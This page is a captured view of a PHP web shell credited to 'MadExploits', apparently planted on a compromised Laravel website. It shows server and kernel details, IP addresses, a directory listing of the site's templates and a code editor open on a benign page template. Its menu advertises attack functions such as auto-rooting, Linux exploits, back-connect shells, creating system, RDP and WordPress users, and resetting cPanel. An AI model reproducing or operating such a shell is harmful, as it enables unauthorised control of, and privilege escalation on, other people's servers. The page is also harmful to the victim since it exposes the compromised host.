Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.97
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpromax.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
113
B
-rw-r--r--
blogs.blade.php
3.89
KB
-rw-r--r--
contact_us.blade.php
9.79
KB
-rw-r--r--
index.blade.php
15.19
KB
-rw-r--r--
index_old.blade.php
940
B
-rw-r--r--
portfolio.blade.php
14.99
KB
-rw-r--r--
post.blade.php
4.18
KB
-rw-r--r--
practice_area.blade.php
2.1
KB
-rw-r--r--
privacy_security.blade.php
876
B
-rw-r--r--
projects.blade.php
1.68
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
13.68
KB
-rw-r--r--
service_detail.blade.php
2.88
KB
-rw-r--r--
services.blade.php
4.55
KB
-rw-r--r--
sitemap.blade.php
4.12
KB
-rw-r--r--
sitemapxml.blade.php
2.34
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
988
B
-rw-r--r--
thank_you.blade.php
1.07
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : practice_area.blade.php
@extends('layouts.app') @section('contents') <style> .page-title .content-box .title h1{ font-size:70px; /* margin-top: 60px; */ font-weight: 600; color: #383838; } </style> <!-- Page Title --> <section class="page-title centred" style="background-image: url({{'assets/images/background/specialities_sohaib_10-13-23.png'}});"> <div class="auto-container"> <div class="content-box"> <div class="title"> <h1>Our Specialities</h1> </div> </div> </div> </section> <!-- End Page Title --> <!-- service-page-section --> <section class="service-page-section"> <div class="auto-container"> <div class="row clearfix"> @foreach($practiceAreas as $practiceArea) <div class="col-lg-4 col-md-6 col-sm-12 service-block mb-4"> <div class="service-block-one wow fadeInUp animated animated" data-wow-delay="00ms" data-wow-duration="1500ms"> <div class="inner-box"> <figure class="image-box"> <img width="370px" height="247px" src="{{asset('assets/services/'.$practiceArea->image2)}}" alt="{{$practiceArea->image2_alt}}"> </figure> <div class="lower-content"> <h3><a href="{{url($practiceArea->slug)}}">{{$practiceArea->title}}</a></h3> <p>{!! Str::limit( strip_tags($practiceArea->description), 90, ' ...') !!}</p> <div class="link"><a href="{{url($practiceArea->slug)}}">Read More</a></div> <div class="light-icon"><i class="flaticon-consulting"></i></div> </div> </div> </div> </div> @endforeach </div> </div> </section> <!-- service-page-section end --> @endsection
Close